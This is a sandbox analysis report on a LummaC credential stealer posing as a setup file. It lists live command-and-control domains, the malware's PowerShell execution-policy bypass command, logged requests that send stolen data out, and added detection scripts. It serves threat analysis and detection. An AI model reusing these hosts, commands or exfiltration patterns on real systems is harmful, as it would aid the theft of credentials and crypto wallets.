
Windows Analysis Report
#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe

Overview

General Information

Sample name: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
renamed by the sandbox because the original name contains non-ASCII characters: each #Uxxxx token is one UTF-16 code unit, and the five surrogate pairs decode to U+1D64E U+1D640 U+1D64F U+1D650 U+1D64B, the mathematical sans-serif bold italic capitals 𝙎𝙀𝙏𝙐𝙋, so the file was delivered as 𝙎𝙀𝙏𝙐𝙋.exe, a styled look-alike of SETUP.exe
Original sample name: 𝙎𝙀𝙏𝙐𝙋.exe
Analysis ID: 1601483
MD5: c6107e0d217c3ce4f5d8c6198622556b
SHA1: 77a152d6872184eb11824aea4371b7cb9577ea5d
SHA256: fec28394e0eef7ed5360f4a4ad4dc04e7c38afa25cb3086f988042a383dfe97d
Tags: exe, LummaStealer, user-aachum
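The sample name above is the report's own escaping of a Unicode file name, and the trick it hides is worth checking mechanically rather than by eye. The script below is an added example, not part of the Joe Sandbox report: it decodes the sandbox's #Uxxxx tokens (one per UTF-16 code unit, so a character outside the Basic Multilingual Plane arrives as a surrogate pair) and then applies NFKC normalisation, which folds Unicode "mathematical" and fullwidth letter styles back to plain ASCII. A name that is not ASCII but normalises to ASCII is a styled look-alike by construction. The fullwidth and accented sample names are constructed for the demonstration; the verdict labels are this example's own.

```python
"""Decode a sandbox-escaped sample name and reveal the ASCII name it imitates.

Added example; not part of the Joe Sandbox report. REPORT_NAME is the name the
report shows; FULLWIDTH_NAME and the other inputs are constructed here.
"""
import re
import unicodedata

ESCAPE = re.compile(r"#U([0-9A-Fa-f]{4})")

# Name as printed in the report (five surrogate pairs + ".exe").
REPORT_NAME = "#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe"
# Constructed: fullwidth "setup.exe" escaped the same way (BMP, one token per char).
FULLWIDTH_NAME = "#Uff53#Uff45#Uff54#Uff55#Uff50.exe"


def decode_escaped_name(name: str) -> str:
    """Replace every #Uxxxx token by its code unit, then rejoin surrogate pairs."""
    with_units = ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), name)
    # Lone surrogates are not valid text. Round-trip through UTF-16 so that a
    # high/low pair becomes the single supplementary character it encodes;
    # an unpaired surrogate degrades to U+FFFD instead of raising.
    return with_units.encode("utf-16", "surrogatepass").decode("utf-16", "replace")


def analyze_sample_name(name: str) -> dict:
    """Classify a file name by what NFKC normalisation does to it."""
    decoded = decode_escaped_name(name)
    normalized = unicodedata.normalize("NFKC", decoded)
    if decoded.isascii():
        verdict = "plain-ascii"
    elif normalized.isascii():
        # Styled Latin letters (math alphabets, fullwidth forms) that fold to
        # ASCII: the name was chosen to read as an ordinary one while defeating
        # a plain-text match on e.g. "setup.exe".
        verdict = "styled-ascii-lookalike"
    else:
        # Genuine non-Latin text or cross-script homoglyphs (Cyrillic "а" for
        # Latin "a"), which NFKC does not fold; needs a confusables check.
        verdict = "non-ascii"
    return {
        "decoded": decoded,
        "normalized": normalized,
        "verdict": verdict,
        "non_ascii_chars": [unicodedata.name(c, "UNKNOWN") for c in decoded if not c.isascii()],
    }


if __name__ == "__main__":
    for n in (REPORT_NAME, FULLWIDTH_NAME, "caf#U00e9.exe", "setup.exe"):
        r = analyze_sample_name(n)
        print(f"{r['verdict']:24} {r['decoded']!r} -> {r['normalized']!r}")
```

Comparing the normalised name against a blocklist (or against the report's own "Original sample name") catches this whole family of lures; NFKC does not fold cross-script homoglyphs, so the "non-ascii" verdict still needs a confusables table or manual review.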

Detection

LummaC Stealer
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found many strings related to Crypto-Wallets (likely being stolen)
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

(Classification chart: categories Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale clean / suspicious / malicious)

Process tree (analysis system: w10x64):
  • #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe (PID: 7772, cmdline: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", MD5: C6107E0D217C3CE4F5D8C6198622556B)
    • powershell.exe (PID: 4640, cmdline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2808, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)

Malware configuration (extracted, LummaC):
{
  "C2 url": [
    "abaft-taboo.bond",
    "noxiuos-utopi.bond",
    "moonehobno.bond",
    "rainy-lamep.bond",
    "elfinyamen.bond",
    "cowertbabei.bond",
    "learnyprocce.bond",
    "conquemappe.bond",
    "traveladdicts.top"
  ],
  "Build id": "MeHdy4--pl2yan1"
}
Yara matches (Source; Rule; Description; Author; Strings):
  sslproxydump.pcap; JoeSecurity_LummaCStealer_3; Yara detected LummaC Stealer; Joe Security
  sslproxydump.pcap; JoeSecurity_LummaCStealer_2; Yara detected LummaC Stealer; Joe Security
  00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; Windows_Trojan_Donutloader_f40e3759; unknown; unknown
    • 0x5311c:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
    • 0x566b2:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
  00000000.00000003.1908607385.000000000087B000.00000004.00000020.00020000.00000000.sdmp; JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
  Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772; JoeSecurity_LummaCStealer_3; Yara detected LummaC Stealer; Joe Security
  Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772; JoeSecurity_CredentialStealer; Yara detected Credential Stealer; Joe Security
  Process Memory Space: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe PID: 7772; JoeSecurity_LummaCStealer; Yara detected LummaC Stealer; Joe Security

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe", ParentImage: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ParentProcessId: 7772, ParentProcessName: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, ProcessCommandLine: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1", ProcessId: 4640, ProcessName: powershell.exe
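All four Sigma hits above fire on the same event: a user-land executable on the Desktop spawning powershell -exec bypass -f with a script in the user's Temp directory. The script below is an added example (not one of the Sigma rules the report cites and not Joe Sandbox code) that evaluates that chain as three independent indicators over process-creation events, so it can be dropped into a log pipeline that exposes Image, CommandLine and ParentImage. The first event is constructed from the report's process tree; the two benign events and the verdict labels are this example's own. The execution-policy check matches any abbreviation of -ExecutionPolicy because PowerShell accepts unambiguous parameter-name prefixes, which is why the report's sample gets away with -exec.

```python
"""Flag the PowerShell launch chain seen in this report from process-creation events.

Added example; not part of the Joe Sandbox report and not a Sigma rule.
SAMPLE_EVENTS[0] mirrors the report's process tree; the rest are constructed.
"""
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so
# -ExecutionPolicy shows up as -ex, -exec, -ep and so on; match the value.
EXEC_POLICY_BYPASS = re.compile(r"(?i)(?:^|\s)-(?:ex\w*|ep)\s+(?:bypass|unrestricted)\b")
# Script path under the per-user temp directory.
SCRIPT_IN_TEMP = re.compile(r'(?i)\\AppData\\Local\\Temp\\[^\s"]+\.ps1\b')
# Parent binary living somewhere an unprivileged user can write to.
USER_WRITABLE_PARENT = re.compile(r"(?i)\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData\\Local\\Temp)\\")
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")

SAMPLE_EVENTS = [
    {   # constructed from the report's process tree
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\KOZ4VON644XMYEN5.ps1"',
        "ParentImage": r"C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe",
    },
    {   # constructed benign: scheduled admin script from a system location
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -NoProfile -File "C:\ProgramData\Scripts\backup.ps1"',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # constructed: bypass used by an installer, but nothing in a user-writable path
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -ExecutionPolicy Bypass -File "C:\Program Files\Vendor\setup.ps1"',
        "ParentImage": r"C:\Program Files\Vendor\installer.exe",
    },
]


def evaluate(event):
    """Return the set of indicator names that fire on one process-creation event."""
    image = event.get("Image", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return set()
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    hits = set()
    if EXEC_POLICY_BYPASS.search(cmd):
        hits.add("execution-policy-bypass")
    if SCRIPT_IN_TEMP.search(cmd):
        hits.add("script-in-user-temp")
    if USER_WRITABLE_PARENT.search(parent):
        hits.add("parent-in-user-writable-path")
    return hits


def triage(events):
    """Score each event; all three indicators together is the chain this report shows."""
    results = []
    for ev in events:
        hits = evaluate(ev)
        verdict = {3: "high", 2: "medium", 1: "low"}.get(len(hits), "none")
        results.append((verdict, sorted(hits), ev["CommandLine"]))
    return results


if __name__ == "__main__":
    for verdict, hits, cmd in triage(SAMPLE_EVENTS):
        print(f"{verdict:6} {hits} {cmd}")
```

Each indicator on its own is noisy in an enterprise (installers and admin tooling use -ExecutionPolicy Bypass routinely); the combination with a script in %TEMP% and a parent in a user-writable directory is what separates this sample's chain from those.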
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP:port | Destination IP:port | Protocol):
2025-01-28T16:12:23.295506+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49805 | 172.67.202.141:443 | TCP
2025-01-28T16:12:35.723772+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49882 | 172.67.202.141:443 | TCP
2025-01-28T16:12:37.124523+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49891 | 172.67.202.141:443 | TCP
2025-01-28T16:12:49.974505+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49224 | 172.67.202.141:443 | TCP
2025-01-28T16:13:02.961072+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49233 | 172.67.202.141:443 | TCP
2025-01-28T16:13:05.572469+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49234 | 172.67.202.141:443 | TCP
2025-01-28T16:13:23.199997+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49235 | 172.67.202.141:443 | TCP
2025-01-28T16:13:36.459364+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49236 | 172.67.202.141:443 | TCP
2025-01-28T16:13:37.708029+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9:49237 | 104.26.3.16:443 | TCP
2025-01-28T16:12:35.235027+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9:49805 | 172.67.202.141:443 | TCP
2025-01-28T16:12:36.218632+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9:49882 | 172.67.202.141:443 | TCP
2025-01-28T16:13:37.219436+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9:49236 | 172.67.202.141:443 | TCP
2025-01-28T16:12:35.235027+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9:49805 | 172.67.202.141:443 | TCP
2025-01-28T16:12:36.218632+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.9:49882 | 172.67.202.141:443 | TCP
2025-01-28T16:13:04.118061+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.9:49233 | 172.67.202.141:443 | TCP


              AV Detection

Source: moonehobno.bond; Avira URL Cloud: Label: malware
Source: noxiuos-utopi.bond; Avira URL Cloud: Label: malware
Source: learnyprocce.bond; Avira URL Cloud: Label: malware
Source: rainy-lamep.bond; Avira URL Cloud: Label: malware
Source: elfinyamen.bond; Avira URL Cloud: Label: malware
Source: cowertbabei.bond; Avira URL Cloud: Label: malware
Source: abaft-taboo.bond; Avira URL Cloud: Label: malware
Source: conquemappe.bond; Avira URL Cloud: Label: malware
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: LummaC {"C2 url": ["abaft-taboo.bond", "noxiuos-utopi.bond", "moonehobno.bond", "rainy-lamep.bond", "elfinyamen.bond", "cowertbabei.bond", "learnyprocce.bond", "conquemappe.bond", "traveladdicts.top"], "Build id": "MeHdy4--pl2yan1"}
Source: Submitted sample; Integrated Neural Analysis Model: Matched 99.7% probability
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: abaft-taboo.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: noxiuos-utopi.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: moonehobno.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: rainy-lamep.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: elfinyamen.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: cowertbabei.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: learnyprocce.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: conquemappe.bond
Source: 00000000.00000002.2254958129.0000000000760000.00000040.00001000.00020000.00000000.sdmp; String decryptor: traveladdicts.top
Source: #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49805 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49882 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49891 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49224 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49233 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49234 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49235 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.202.141:443 -> 192.168.2.9:49236 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.9:49237 version: TLS 1.2
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; Directory queried: number of queries: 1001
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local\Google
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe; File opened: C:\Users\user\AppData\Local\Mozilla

              Networking

Source: Network traffic; Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49805 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49805 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49882 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.9:49233 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49882 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49236 -> 172.67.202.141:443
Source: Malware configuration extractor; URLs: abaft-taboo.bond
Source: Malware configuration extractor; URLs: noxiuos-utopi.bond
Source: Malware configuration extractor; URLs: moonehobno.bond
Source: Malware configuration extractor; URLs: rainy-lamep.bond
Source: Malware configuration extractor; URLs: elfinyamen.bond
Source: Malware configuration extractor; URLs: cowertbabei.bond
Source: Malware configuration extractor; URLs: learnyprocce.bond
Source: Malware configuration extractor; URLs: conquemappe.bond
Source: Malware configuration extractor; URLs: traveladdicts.top
Source: unknown; DNS query: name: rentry.co
Source: global traffic; TCP traffic: 192.168.2.9:49161 -> 162.159.36.2:53
Source: Joe Sandbox View; IP Address: 104.26.3.16
Source: Joe Sandbox View; IP Address: 172.67.202.141
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49805 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49882 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49891 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49233 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49235 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49234 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49236 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49224 -> 172.67.202.141:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49237 -> 104.26.3.16:443
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=4R91O26XP53ONV79 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12835 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6TPX6EWWU8QLG | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15035 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ENY5G9P6AN86O47W | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20569 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UDD2YJGU6IP3ESK79Y4 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 2656 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=FCR2CY7USXN11D4G | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 574644 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: traveladdicts.top
Source: global traffic; HTTP traffic detected: GET /feouewe5/raw HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: rentry.co
Source: unknown; TCP traffic detected without corresponding DNS query: 162.159.36.2 (4 occurrences)
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 occurrences)
